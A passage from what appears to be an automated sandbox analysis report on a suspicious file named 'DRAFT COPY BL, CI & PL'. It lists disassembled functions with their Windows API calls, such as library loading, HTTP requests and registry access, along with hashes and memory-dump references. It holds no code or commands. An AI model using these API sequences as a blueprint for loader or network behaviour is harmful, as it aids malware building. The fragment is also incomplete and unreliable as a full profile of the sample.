                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                • String ID: 0
                                                                • API String ID: 4152858687-4108050209
                                                                • Opcode ID: df93748df28026e120bd50aa8452f589aae65c302aa32c187c5f8769bf2b3d95
                                                                • Instruction ID: 65e883c53e0f85e5f746526e0c2e1f8c4ee2ccd7ff7a958b3a18076e7cca5b7a
                                                                • Opcode Fuzzy Hash: df93748df28026e120bd50aa8452f589aae65c302aa32c187c5f8769bf2b3d95
                                                                • Instruction Fuzzy Hash: F751BD71608301AADB24DF2CD845A6FB7E8EF99360F140A6DF8D5D6190EB70CD44DBA2
                                                                Function 0098D56C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0098D5D4
                                                                • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0098D60A
                                                                • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0098D61B
                                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0098D69D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ErrorMode$AddressCreateInstanceProc
                                                                • String ID: DllGetClassObject
                                                                • API String ID: 753597075-1075368562
                                                                • Opcode ID: ddbddead77e1fabf8c6e3a6fda65d2715dba3d624816ecea9c42b8aa2a55cbc8
                                                                • Instruction ID: 2091bfb128868e3cb6455f8977bfcc31cbca27d83576c4ec15c53c281bef8256
                                                                • Opcode Fuzzy Hash: ddbddead77e1fabf8c6e3a6fda65d2715dba3d624816ecea9c42b8aa2a55cbc8
                                                                • Instruction Fuzzy Hash: BC418FB1601208EFDB15EF54C884B9ABBA9EF44314F1585ADEC099F385E7B1DE40CBA0
                                                                Function 00992753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _memset.LIBCMT ref: 009927C0
                                                                • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 009927DC
                                                                • DeleteMenu.USER32(?,00000007,00000000), ref: 00992822
                                                                • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,009F5890,00000000), ref: 0099286B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Menu$Delete$InfoItem_memset
                                                                • String ID: 0
                                                                • API String ID: 1173514356-4108050209
                                                                • Opcode ID: a4fb88bb800251fcc139feb16355e23ac3dfa3d848cc8a0d5da0fb2f0f56812a
                                                                • Instruction ID: 4b5410d6cf9ebb9911c56b7aaab8dc065eee8a38499c6f3f1a601efb4e1e7ee1
                                                                • Opcode Fuzzy Hash: a4fb88bb800251fcc139feb16355e23ac3dfa3d848cc8a0d5da0fb2f0f56812a
                                                                • Instruction Fuzzy Hash: D841AE74208301AFDB20DF29CC44F2ABBE8EF85324F044A2DF9A5972D1D770A805CB62
                                                                Function 009AD7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 009AD7C5
                                                                  • Part of subcall function 0093784B: _memmove.LIBCMT ref: 00937899
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: BuffCharLower_memmove
                                                                • String ID: cdecl$none$stdcall$winapi
                                                                • API String ID: 3425801089-567219261
                                                                • Opcode ID: 5caba85504c564f24c7cc3e9685820910db625b86bac9084f66bd9762bf1582d
                                                                • Instruction ID: 50d2e6699941921d541644778aaa96eb21c6068d34a5293af9cf5ca7a10f97f1
                                                                • Opcode Fuzzy Hash: 5caba85504c564f24c7cc3e9685820910db625b86bac9084f66bd9762bf1582d
                                                                • Instruction Fuzzy Hash: 7E31A171904619AFCF10EF99CC55AEEB7B5FF85320F108A29E826976D1DB31AD05CB80
                                                                Function 00988E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00937DE1: _memmove.LIBCMT ref: 00937E22
                                                                  • Part of subcall function 0098AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0098AABC
                                                                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00988F14
                                                                • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00988F27
                                                                • SendMessageW.USER32(?,00000189,?,00000000), ref: 00988F57
                                                                  • Part of subcall function 00937BCC: _memmove.LIBCMT ref: 00937C06
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$_memmove$ClassName
                                                                • String ID: ComboBox$ListBox
                                                                • API String ID: 365058703-1403004172
                                                                • Opcode ID: 032e6c7e5fbcd970c76fc5c8a1d12661717c683a4985e99c2ff4a9df678c83f2
                                                                • Instruction ID: 302e224a8694f2fc1fdf5513491885833317d5ed36fdfaff36ef35800f92b603
                                                                • Opcode Fuzzy Hash: 032e6c7e5fbcd970c76fc5c8a1d12661717c683a4985e99c2ff4a9df678c83f2
                                                                • Instruction Fuzzy Hash: 5321F571904108BADB14BBA0CC85EFFB779DF85320F544519F921A72E1DB39080A9B60
                                                                Function 009A182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 009A184C
                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009A1872
                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 009A18A2
                                                                • InternetCloseHandle.WININET(00000000), ref: 009A18E9
                                                                  • Part of subcall function 009A2483: GetLastError.KERNEL32(?,?,009A1817,00000000,00000000,00000001), ref: 009A2498
                                                                  • Part of subcall function 009A2483: SetEvent.KERNEL32(?,?,009A1817,00000000,00000000,00000001), ref: 009A24AD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                • String ID:
                                                                • API String ID: 3113390036-3916222277
                                                                • Opcode ID: 7f7912e56687e7a7956a464ebed116086127f79e5289bf1ea2db5ad51b3bf8d1
                                                                • Instruction ID: a18e3377d081eb813f61c784cd75f874b0e42dea0ce2ed53112277a90655c275
                                                                • Opcode Fuzzy Hash: 7f7912e56687e7a7956a464ebed116086127f79e5289bf1ea2db5ad51b3bf8d1
                                                                • Instruction Fuzzy Hash: 4E21C2B1504308BFEB119F69DC85FBF77EDEB8A754F10412AF80596140EB288D05A7E0
                                                                Function 009B63E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00931D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00931D73
                                                                  • Part of subcall function 00931D35: GetStockObject.GDI32(00000011), ref: 00931D87
                                                                  • Part of subcall function 00931D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00931D91
                                                                • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 009B6461
                                                                • LoadLibraryW.KERNEL32(?), ref: 009B6468
                                                                • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 009B647D
                                                                • DestroyWindow.USER32(?), ref: 009B6485
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                • String ID: SysAnimate32
                                                                • API String ID: 4146253029-1011021900
                                                                • Opcode ID: b7c98f3cb3982839ba4f3efe4db27ea8852502237ab9ce1a682d9e975213364d
                                                                • Instruction ID: dab57d8e8b8986d9b4e7f2c87f89927269209716595c5742ce80d77c4b723afb
                                                                • Opcode Fuzzy Hash: b7c98f3cb3982839ba4f3efe4db27ea8852502237ab9ce1a682d9e975213364d
                                                                • Instruction Fuzzy Hash: 86219F71110605BFEF104FA4DD94EFB77AEEB59378F104A29FA10920A0D779EC41A760
                                                                Function 00996D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetStdHandle.KERNEL32(0000000C), ref: 00996DBC
                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00996DEF
                                                                • GetStdHandle.KERNEL32(0000000C), ref: 00996E01
                                                                • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00996E3B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: CreateHandle$FilePipe
                                                                • String ID: nul
                                                                • API String ID: 4209266947-2873401336
                                                                • Opcode ID: 99ece5da84df7a2221eaf28397a078b107d0d93c35af2c073182c409c6bdaaa8
                                                                • Instruction ID: ac15fe8e5d33d68e65c85b736495ef9a3c76a34cfd5970a94db817604b3becee
                                                                • Opcode Fuzzy Hash: 99ece5da84df7a2221eaf28397a078b107d0d93c35af2c073182c409c6bdaaa8
                                                                • Instruction Fuzzy Hash: 24218E7560020AABDF209F6DDD05B9A7BB8EF84720F204A29FDB0D72D0DB71A950DB50
                                                                Function 00996E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetStdHandle.KERNEL32(000000F6), ref: 00996E89
                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00996EBB
                                                                • GetStdHandle.KERNEL32(000000F6), ref: 00996ECC
                                                                • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00996F06
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: CreateHandle$FilePipe
                                                                • String ID: nul
                                                                • API String ID: 4209266947-2873401336
                                                                • Opcode ID: 8e90e94855269b238fa6b14415f0db5668e8d2a597d579a955db68a6cfae9902
                                                                • Instruction ID: 0bbec6d3388f4c9e0b72aa6a288fcc367210910da3df8543b98bb3d85aca0b69
                                                                • Opcode Fuzzy Hash: 8e90e94855269b238fa6b14415f0db5668e8d2a597d579a955db68a6cfae9902
                                                                • Instruction Fuzzy Hash: 10216079500305ABDF209FADDD04AAA77A8AF55731F200B19F9A1D72D0D770A8618B50
                                                                Function 0099AC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetErrorMode.KERNEL32(00000001), ref: 0099AC54
                                                                • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0099ACA8
                                                                • __swprintf.LIBCMT ref: 0099ACC1
                                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000,009BF910), ref: 0099ACFF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ErrorMode$InformationVolume__swprintf
                                                                • String ID: %lu
                                                                • API String ID: 3164766367-685833217
                                                                • Opcode ID: e2582d92a61befa32ab2ac2eed786789219001bbb668ba597ed8eb1419bb187f
                                                                • Instruction ID: 30b902ee459333343b46522711c955f2da3b45026941bea01678479fe3e6953e
                                                                • Opcode Fuzzy Hash: e2582d92a61befa32ab2ac2eed786789219001bbb668ba597ed8eb1419bb187f
                                                                • Instruction Fuzzy Hash: 62214F35A00109AFCB10EF69CD85EAE7BB8EF89714B004469F909EB251DB71EA41DB61
                                                                Function 00991AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CharUpperBuffW.USER32(?,?), ref: 00991B19
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: BuffCharUpper
                                                                • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                • API String ID: 3964851224-769500911
                                                                • Opcode ID: 25db002a1a062d54088095b0e2c009a28346ef5735d1e8320da9f4a7e42c1709
                                                                • Instruction ID: ed8f91fecad0e7562193e0a297a1c23f29ff83e1a6f17c53e29ae5809e386b9e
                                                                • Opcode Fuzzy Hash: 25db002a1a062d54088095b0e2c009a28346ef5735d1e8320da9f4a7e42c1709
                                                                • Instruction Fuzzy Hash: 63118E319002498FCF10EF99D8519FEB7B5FFA5304B1044A4E81967296EF329D0ACF40
                                                                Function 009AEB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 009AEC07
                                                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 009AEC37
                                                                • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 009AED6A
                                                                • CloseHandle.KERNEL32(?), ref: 009AEDEB
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                • String ID:
                                                                • API String ID: 2364364464-0
                                                                • Opcode ID: d68c2c4acf12144fbc53a3ba5474209b0a5eb79c0fef14104a18eb809f8e3693
                                                                • Instruction ID: 1f6f3381b93f94d4c57b5069ca476f8f98f27636e2d38339b9bbcae5288ce96b
                                                                • Opcode Fuzzy Hash: d68c2c4acf12144fbc53a3ba5474209b0a5eb79c0fef14104a18eb809f8e3693
                                                                • Instruction Fuzzy Hash: F0815F716047009FD760EF28D886F2AB7E5AF85720F14891DF9999B2D2DBB0AD40CF91
                                                                Function 0095541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                • String ID:
                                                                • API String ID: 1559183368-0
                                                                • Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                                • Instruction ID: 82c0aafb35718242cae8fabbd4af23d7d02091678ce9ce59ec9c9c20032f34dc
                                                                • Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                                • Instruction Fuzzy Hash: BD51E870A00B05DBCB24DF6BD89066E77BAAF40333F258729FC25962D2E7749D598B40
                                                                Function 009B0037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00937DE1: _memmove.LIBCMT ref: 00937E22
                                                                  • Part of subcall function 009B0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,009AFDAD,?,?), ref: 009B0E31
                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009B00FD
                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009B013C
                                                                • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 009B0183
                                                                • RegCloseKey.ADVAPI32(?,?), ref: 009B01AF
                                                                • RegCloseKey.ADVAPI32(00000000), ref: 009B01BC
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                • String ID:
                                                                • API String ID: 3440857362-0
                                                                • Opcode ID: 2ead612b64812970be4a5943f201da9df6b9f81bf036782540c869f1819b0019
                                                                • Instruction ID: e3d4a3d13f30a0cc2e5c414a958868551f9c92d53a4ddf5f4d190dc7b338aff9
                                                                • Opcode Fuzzy Hash: 2ead612b64812970be4a5943f201da9df6b9f81bf036782540c869f1819b0019
                                                                • Instruction Fuzzy Hash: 12512871208204AFD714EF58C991FABB7E9FF84324F40492DF596872A2DB71E905CB52
                                                                Function 009AD8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00939837: __itow.LIBCMT ref: 00939862
                                                                  • Part of subcall function 00939837: __swprintf.LIBCMT ref: 009398AC
                                                                • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 009AD927
                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 009AD9AA
                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 009AD9C6
                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 009ADA07
                                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 009ADA21
                                                                  • Part of subcall function 00935A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00997896,?,?,00000000), ref: 00935A2C
                                                                  • Part of subcall function 00935A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00997896,?,?,00000000,?,?), ref: 00935A50
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                • String ID:
                                                                • API String ID: 327935632-0
                                                                • Opcode ID: 70dafd389bc9e65593882c6fe3fd465d9205ea5bca9d9c4adac727e023b1730f
                                                                • Instruction ID: ccd35bd6143c16865fccd3cc605f440ba8fbd607d077a42919dc3aa3147eb2d3
                                                                • Opcode Fuzzy Hash: 70dafd389bc9e65593882c6fe3fd465d9205ea5bca9d9c4adac727e023b1730f
                                                                • Instruction Fuzzy Hash: 81511635A05209DFCB00EFA8C484AADB7B8EF89320F058565E856AB312D730ED45CF90
                                                                Function 0099E571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                                Download Yara Rule
                                                                APIs
